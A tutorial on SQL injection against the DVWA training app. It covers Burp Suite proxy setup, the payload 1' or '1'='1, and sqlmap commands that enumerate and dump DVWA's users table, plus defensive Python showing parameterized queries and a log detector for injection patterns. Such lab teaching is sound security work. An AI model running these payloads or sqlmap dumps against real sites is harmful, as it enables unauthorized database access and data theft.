SQLi with Damn Vulnerable Web App (DVWA)
Damn Vulnerable Web App (DVWA)
Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a classroom environment.
To install the DVWA project, follow the instructions on the following page:
Burp suite
Burp Suite is a tool for performing penetration testing of web applications. With the Burp Suite, administrators can intercept and manipulate HTTP / HTTPS traffic to web applications before it is sent to the server. This enables security gaps in web applications to be discovered quickly and effectively.
To start intercepting web traffic, you have to set the proxy of the browser to 127.0.0.1:8080. In Burp Suite the proxy listener is configured on 127.0.0.1:8080 by default.
Browser
Proxy Settings in Browser
In this tutorial, it will be demonstrated how to configure the proxy settings in Firefox to work with Burp Suite. While this tutorial focuses on Firefox, similar steps can be followed for other browsers. Alternatively, the internal browser provided by Burp Suite can be used to intercept traffic directly.
Steps to Set Up the Proxy in Firefox
- Open Firefox and type about:preferences into the address bar.
- Navigate to the General tab.
- Scroll to the bottom of the page and locate the Network Settings section.
- Click on the Settings... button.
Configuring the Proxy
In the Network Settings window:
- Select the option to configure a manual proxy.
- Enter the IP address and port of the Burp Suite proxy server into the respective fields. Typically, the default values are:
* IP Address: 127.0.0.1
* Port: 8080
- Ensure that "Use this proxy server for all protocols" is checked.
- Click OK to save the settings.
Configuring Localhost Traffic
To ensure that traffic destined for localhost (e.g., self-hosted applications like DVWA) is also routed through the proxy server:
- Type about:config into the address bar and press Enter.
- In the configuration window, search for network.proxy.testing_localhost_is_secure_when_hijacked.
- Set this preference to true by double-clicking on it or using the toggle button.
SQL Injection
In the DVWA project move to "SQL Injection" and type in the following input as User ID:
1' or '1'='1
This returns all users stored in the database, because the WHERE condition of the query is now always true.
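The following Python script is an added example, not DVWA's code (DVWA itself is PHP/MySQL; this uses an in-memory SQLite table with constructed sample rows as a stand-in). It models the kind of lookup the page describes, once by pasting the User ID into the SQL text and once as a bound parameter, and shows why the input 1' or '1'='1 returns every row in the first case and nothing in the second.

```python
import sqlite3

# Constructed sample data standing in for a users table (not DVWA's schema or data).
SAMPLE_USERS = [
    (1, "admin", "admin"),
    (2, "Gordon", "Brown"),
    (3, "Hack", "Me"),
    (4, "Pablo", "Picasso"),
    (5, "Bob", "Smith"),
]

PAYLOAD = "1' or '1'='1"  # the User ID input from the tutorial


def make_db():
    """Create an in-memory database holding the constructed sample users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn, user_id):
    """Vulnerable lookup: the untrusted value becomes part of the SQL text.

    With user_id = "1' or '1'='1" the statement sent to the database reads
    WHERE user_id = '1' or '1'='1', so the condition holds for every row.
    """
    query = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return conn.execute(query).fetchall()


def lookup_parameterized(conn, user_id):
    """Hardened lookup: the value is bound as a parameter.

    The SQL text is fixed; the database compares the whole input string
    against user_id and never interprets quotes or keywords inside it.
    """
    query = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(query, (user_id,)).fetchall()


def demo():
    """Run both lookups with an honest id and with the injection payload."""
    conn = make_db()
    return {
        "honest_vulnerable": lookup_vulnerable(conn, "1"),
        "payload_vulnerable": lookup_vulnerable(conn, PAYLOAD),
        "honest_param": lookup_parameterized(conn, "1"),
        "payload_param": lookup_parameterized(conn, PAYLOAD),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {len(rows)} row(s) -> {rows}")
```

The vulnerable lookup returns all five constructed rows for the payload, while the parameterized one returns an empty result for it and the single matching row for an honest id. Escaping the quote character (DVWA's medium level does this) closes this particular input, but binding parameters removes the whole class of problem, which is why it is the fix to prefer.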
Afterwards, switching to the Burp Suite tab "Proxy" -> "History" shows that the request has been captured. The request includes the "PHPSESSID" value as part of the Cookie header.
With this session id it is possible to reach the database and extract further information with the help of a third tool called "sqlmap". To list the databases of the DBMS, use the following command:
sqlmap -u "http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit" "--cookie=security=<e.g. medium>; PHPSESSID=<SessionID>" --dbs
To retrieve the tables of a specific database, for example the dvwa database, replace the "--dbs" option with "--tables" and name the database with the "-D" option:
sqlmap -u "http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit" "--cookie=security=low; PHPSESSID=t664gnfopfo6kem1nkon3a6kvb" --tables -D dvwa
Furthermore, the columns of a table in the "dvwa" database (here the users table) can be listed by executing the following command:
sqlmap -u "http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit" "--cookie=security=low; PHPSESSID=t664gnfopfo6kem1nkon3a6kvb" --columns -D dvwa -T users
Finally, to reach the sensitive data, the attacker executes the following command:
sqlmap -u "http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit" "--cookie=security=low; PHPSESSID=t664gnfopfo6kem1nkon3a6kvb" --dump -D dvwa -T users
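Every one of the requests above passes through the web server and lands in its access log, which is where a defender notices this activity. The following Python script is an added example, not part of this tutorial or of sqlmap: it parses constructed lines in the combined log format and flags two things the page makes visible, an injection-shaped value in the query string (the tutorial's 1' or '1'='1, URL-encoded) and sqlmap's default User-Agent, which contains the string "sqlmap" unless the operator changes it. The log lines, IP addresses and timestamps are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Combined log format:
# host ident authuser [time] "METHOD path protocol" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Checked against the URL-decoded query string. Deliberately narrow: the aim is
# a low-noise signal for the shapes seen on this page, not a full WAF ruleset.
SQLI_PATTERNS = [
    re.compile(r"'\s*or\s*'", re.I),                 # ' or '  as in 1' or '1'='1
    re.compile(r"\bunion\b.{0,20}\bselect\b", re.I),  # union-based extraction
    re.compile(r"\b(sleep|benchmark)\s*\(", re.I),    # time-based probing
    re.compile(r"--\s|#|/\*"),                        # SQL comment sequences
]

# Constructed sample log (not from a real server): one benign DVWA request, the
# tutorial's payload URL-encoded, a request carrying sqlmap's agent string, and
# an unrelated benign request.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Mar/2024:12:00:01 +0000] "GET /DVWA/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 1532 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/123.0"
10.0.0.5 - - [10/Mar/2024:12:00:09 +0000] "GET /DVWA/vulnerabilities/sqli/?id=1%27+or+%271%27%3D%271&Submit=Submit HTTP/1.1" 200 2210 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/123.0"
10.0.0.5 - - [10/Mar/2024:12:01:00 +0000] "GET /DVWA/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 1532 "-" "sqlmap/1.8 (https://sqlmap.org)"
10.0.0.9 - - [10/Mar/2024:12:02:00 +0000] "GET /DVWA/index.php HTTP/1.1" 200 980 "-" "Mozilla/5.0 (Windows NT 10.0) Chrome/122.0"
"""


def analyze_line(line):
    """Parse one log line; return a record with the reasons it looks suspicious (if any)."""
    m = LOG_RE.match(line)
    if not m:
        return None  # not in the expected format; a real pipeline would count these
    reasons = []
    if "sqlmap" in m["agent"].lower():
        reasons.append("user-agent identifies sqlmap")
    # Decode the query string first so encoded quotes (%27) and plus-as-space are visible.
    decoded_query = unquote_plus(m["path"].partition("?")[2])
    for pattern in SQLI_PATTERNS:
        if pattern.search(decoded_query):
            reasons.append(f"query matches {pattern.pattern!r}")
            break
    return {"ip": m["ip"], "time": m["time"], "path": m["path"], "reasons": reasons}


def find_suspicious(log_text):
    """Return the records of all lines that triggered at least one reason."""
    hits = []
    for line in log_text.splitlines():
        record = analyze_line(line)
        if record and record["reasons"]:
            hits.append(record)
    return hits


if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_LOG):
        print(f'{hit["time"]} {hit["ip"]} {hit["path"]}')
        for reason in hit["reasons"]:
            print(f"    - {reason}")
```

Two of the four constructed lines are flagged: the encoded payload by the query pattern and the sqlmap request by its agent string. The agent check is cheap but only catches tooling that announces itself, since the header is client-controlled; the query check is the more durable signal, and the same decode-then-match step applies to POST bodies if the server logs them.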